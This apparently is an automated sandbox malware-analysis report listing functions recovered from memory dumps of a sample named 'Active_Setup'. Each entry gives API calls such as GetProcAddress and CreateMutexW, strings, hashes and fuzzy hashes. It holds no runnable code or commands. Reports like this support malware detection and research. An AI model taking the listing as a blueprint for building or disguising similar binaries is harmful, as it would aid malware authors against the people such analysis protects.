                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                  • String ID: csm
                                                                                                                                                  • API String ID: 2163707966-1018135373
                                                                                                                                                  • Opcode ID: 13d54e85cf837ba33ea047a1f7b8a7af02b4cf8102853979aa4b33b8047b31c1
                                                                                                                                                  • Instruction ID: 91ae5ed6b8d3a677032f229c424a65f4ab42bf147ac80ec75abe56948759b4f9
                                                                                                                                                  • Opcode Fuzzy Hash: 13d54e85cf837ba33ea047a1f7b8a7af02b4cf8102853979aa4b33b8047b31c1
                                                                                                                                                  • Instruction Fuzzy Hash: 8E01E47150050BFBDF226E51CC54EEA7FAAEF183A0F054050BD9955120DB369AB2EBA0
                                                                                                                                                  Function 0108F11E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,010825D4), ref: 0108F123
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0108F133
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                  • API String ID: 1646373207-3105848591
                                                                                                                                                  • Opcode ID: 0e72ff6037053c4965a438d79254ee2e42230d185d32d1429691df05c2e1c497
                                                                                                                                                  • Instruction ID: 7f925b5e7effdb357817a07468be6b927976d41798bc3acbc2fccb50fcaca967
                                                                                                                                                  • Opcode Fuzzy Hash: 0e72ff6037053c4965a438d79254ee2e42230d185d32d1429691df05c2e1c497
                                                                                                                                                  • Instruction Fuzzy Hash: E2F01D30A04B0AD6DF102BB5A80E6AE7EB9BB81746F824494A6D1E00C8DE3580B58355
                                                                                                                                                  Function 01076E70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemTime.KERNEL32(-00000013,00000000,01077285), ref: 01076E80
                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 01076E90
                                                                                                                                                  • __aulldvrm.LIBCMT ref: 01076EB2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Time$System$File__aulldvrm
                                                                                                                                                  • String ID: gfff
                                                                                                                                                  • API String ID: 239608527-1553575800
                                                                                                                                                  • Opcode ID: 52b7e7a529192d17a41e7262a0bdf42a2f16b78ea7c06cd145322883fc2baf5b
                                                                                                                                                  • Instruction ID: 5b7bbc7c086765c7cefdde002473c550c67b3a7345021c5b9b8c63d3d136c5fa
                                                                                                                                                  • Opcode Fuzzy Hash: 52b7e7a529192d17a41e7262a0bdf42a2f16b78ea7c06cd145322883fc2baf5b
                                                                                                                                                  • Instruction Fuzzy Hash: 0FF036B55043066BC708EF99DC85A9BBBE8FBC4704F04CC1DF5C9C6290E634E5049752
                                                                                                                                                  Function 0109A1AF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 0109A1B6
                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0109A1D3
                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0109A1E1
                                                                                                                                                    • Part of subcall function 01088E71: RaiseException.KERNEL32(?,?,0107FD3A,?,?,?,?,?,0107FD3A,?,010E5BF8,010F4164), ref: 01088EB3
                                                                                                                                                    • Part of subcall function 00FB12B0: std::exception::exception.LIBCMT ref: 00FB12DE
                                                                                                                                                  Strings
                                                                                                                                                  • invalid string position, xrefs: 0109A1BB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                  • String ID: invalid string position
                                                                                                                                                  • API String ID: 3355147766-1799206989
                                                                                                                                                  • Opcode ID: 14b1513f91bd0a37ee671cd2dc2526242cd44004d551650f3d9424cba608cada
                                                                                                                                                  • Instruction ID: db623b98422f2f9db03d395948e2f4f91a8eae8952cb5aa9a1a5311f91af15ea
                                                                                                                                                  • Opcode Fuzzy Hash: 14b1513f91bd0a37ee671cd2dc2526242cd44004d551650f3d9424cba608cada
                                                                                                                                                  • Instruction Fuzzy Hash: ECF0307264021CABCB14FBD1CC15ADEB778EB28361F50041AA284A7140DAB5D900D7A4
                                                                                                                                                  Function 010205A0 Relevance: 6.4, APIs: 4, Instructions: 419COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3938a12000808ecf5b104c08953b4a48a278607cb04fa5e226d06ea31ccff829
                                                                                                                                                  • Instruction ID: ef98108d59448705999cc783328c705aa370231c6ef342650eade4aaae8e984b
                                                                                                                                                  • Opcode Fuzzy Hash: 3938a12000808ecf5b104c08953b4a48a278607cb04fa5e226d06ea31ccff829
                                                                                                                                                  • Instruction Fuzzy Hash: 66D17EB5604315AFE714DF68CC84EBBB7EDEBC9704F044A1CF98587249E674E8058BA2
                                                                                                                                                  Function 0109AD54 Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 0109AD5B
                                                                                                                                                  • _fgetc.LIBCMT ref: 0109AE91
                                                                                                                                                    • Part of subcall function 0109ACC1: std::_String_base::_Xlen.LIBCPMT ref: 0109ACD7
                                                                                                                                                  • _memcpy_s.LIBCMT ref: 0109AE56
                                                                                                                                                  • _ungetc.LIBCMT ref: 0109AEDC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 9762108-0
                                                                                                                                                  • Opcode ID: 049384f32831b95dd768e30ed5ef3d0c0f77c96fd70c23ab0d933a67547744f0
                                                                                                                                                  • Instruction ID: bea3b2199532b8be479512145c516274e4eacffc15a2ebe352648d6be5a3d36d
                                                                                                                                                  • Opcode Fuzzy Hash: 049384f32831b95dd768e30ed5ef3d0c0f77c96fd70c23ab0d933a67547744f0
                                                                                                                                                  • Instruction Fuzzy Hash: BF515572A00609DFCF15EBB9C8649EEB7F9EF59310B10491AE592E7190EB34E904DB50
                                                                                                                                                  Function 0104CE90 Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0104CE20: _signal.LIBCMT ref: 0104CE27
                                                                                                                                                    • Part of subcall function 0104CE20: _signal.LIBCMT ref: 0104CE38
                                                                                                                                                    • Part of subcall function 0104CE20: _signal.LIBCMT ref: 0104CE49
                                                                                                                                                    • Part of subcall function 0104CE20: _signal.LIBCMT ref: 0104CE5A
                                                                                                                                                    • Part of subcall function 0104CE20: _signal.LIBCMT ref: 0104CE6B
                                                                                                                                                    • Part of subcall function 0104CE20: _signal.LIBCMT ref: 0104CE7C
                                                                                                                                                  • _fgets.LIBCMT ref: 0104CF01
                                                                                                                                                  • _feof.LIBCMT ref: 0104CF14
                                                                                                                                                  • _ferror.LIBCMT ref: 0104CF26
                                                                                                                                                  • _fprintf.LIBCMT ref: 0104CFA7
                                                                                                                                                    • Part of subcall function 0104CDD0: GetStdHandle.KERNEL32(000000F6), ref: 0104CE01
                                                                                                                                                    • Part of subcall function 0104CDD0: FlushConsoleInputBuffer.KERNEL32(00000000), ref: 0104CE08
                                                                                                                                                    • Part of subcall function 0104CC40: _fgets.LIBCMT ref: 0104CC5D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _signal$_fgets$BufferConsoleFlushHandleInput_feof_ferror_fprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 600490286-0
                                                                                                                                                  • Opcode ID: e5cfb2ce93c171c0b19ccb72d4c72cf8bec0921ed2e8ac7e6019868c5dd8aac3
                                                                                                                                                  • Instruction ID: e81c5dfbc3f8456812e0a2b21af00a3675f0b13dd9704c94748f53d849b402ed
                                                                                                                                                  • Opcode Fuzzy Hash: e5cfb2ce93c171c0b19ccb72d4c72cf8bec0921ed2e8ac7e6019868c5dd8aac3
                                                                                                                                                  • Instruction Fuzzy Hash: 5031D6F150A3429FE330EB94E9C16ABB7E4EBA0344F04453DFAD486151E63A9404CB52
                                                                                                                                                  Function 00FEE3D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00FEDD50: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000), ref: 00FEDD94
                                                                                                                                                    • Part of subcall function 00FEDD50: GetLastError.KERNEL32(?,?,00000000,00000000), ref: 00FEDDA0
                                                                                                                                                    • Part of subcall function 00FEDD50: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00FEDDC1
                                                                                                                                                    • Part of subcall function 00FEDD50: GetLastError.KERNEL32(?,?,00000000,00000000), ref: 00FEDDCD
                                                                                                                                                  • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000AF), ref: 00FEE3F8
                                                                                                                                                    • Part of subcall function 01081557: __getptd_noexit.LIBCMT ref: 01081557
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$ByteCharMultiWide$__getptd_noexit
                                                                                                                                                  • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                                  • API String ID: 3781935072-2085858615
                                                                                                                                                  • Opcode ID: 7bf12a8c06ab219e6484053673d00ace2114bab6f9d4014980232a73a33fc9b0
                                                                                                                                                  • Instruction ID: b8c9fad9f40876b9df36923207b844278f070cabde26fb87818d3b16446a2d5b
                                                                                                                                                  • Opcode Fuzzy Hash: 7bf12a8c06ab219e6484053673d00ace2114bab6f9d4014980232a73a33fc9b0
                                                                                                                                                  • Instruction Fuzzy Hash: A711CBB6BC131136E53175AA2C87FDB324A9FD1FA1F084066F744BD1C2E6C64415A1B3
                                                                                                                                                  Function 00FB1330 Relevance: 6.1, APIs: 4, Instructions: 82synchronizationCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,00000000,7344748B,?,00000000), ref: 00FB1399
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00FB13A4
                                                                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 00FB13C5
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00FB13CA
                                                                                                                                                    • Part of subcall function 0107FCD6: _malloc.LIBCMT ref: 0107FCF0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateErrorLastMutex$_malloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3575291929-0
                                                                                                                                                  • Opcode ID: bfc6b4caa882cb04124cbb0d00b95138b6ce9df00d246aecb4a4c4940d3a7724
                                                                                                                                                  • Instruction ID: 6cc06d689c3e2c3e352036a082cf7579160718a93ec3424bf3565309ca805749
                                                                                                                                                  • Opcode Fuzzy Hash: bfc6b4caa882cb04124cbb0d00b95138b6ce9df00d246aecb4a4c4940d3a7724
                                                                                                                                                  • Instruction Fuzzy Hash: 583126B1905B849FD320CF2AC980657FBE8FB58650F844A2EE1DAC3A10D339A504CB65
                                                                                                                                                  Function 0108EFE9 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                  • Instruction ID: 3423f4261de619e24af25b932c7ed78180bff5a9ab181c7516c62ca006baedc4
                                                                                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                  • Instruction Fuzzy Hash: 73113D3200814EFFCF666E98CC018EE3F62BB18354B588455FA9899121C636C5B2AF81
                                                                                                                                                  Function 01080470 Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 01080483
                                                                                                                                                    • Part of subcall function 0108AF90: __FindPESection.LIBCMT ref: 0108AFEB
                                                                                                                                                  • __getptd_noexit.LIBCMT ref: 01080493
                                                                                                                                                  • __freeptd.LIBCMT ref: 0108049D
                                                                                                                                                  • ExitThread.KERNEL32 ref: 010804A6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3182216644-0
                                                                                                                                                  • Opcode ID: f391cbb3eb798a7f1d88fa7f92c2e12e46296ca14d82be28a86e4cecdd613815
                                                                                                                                                  • Instruction ID: c521716d5bdfd396adc54549907f863e2b1f5462dc3eaac41e7eaf985aae0660
                                                                                                                                                  • Opcode Fuzzy Hash: f391cbb3eb798a7f1d88fa7f92c2e12e46296ca14d82be28a86e4cecdd613815
                                                                                                                                                  • Instruction Fuzzy Hash: 36D0C2F01493039AE7A037BDE91AB5A3E885B40111F14C035FAC8844BCEE64D440C214
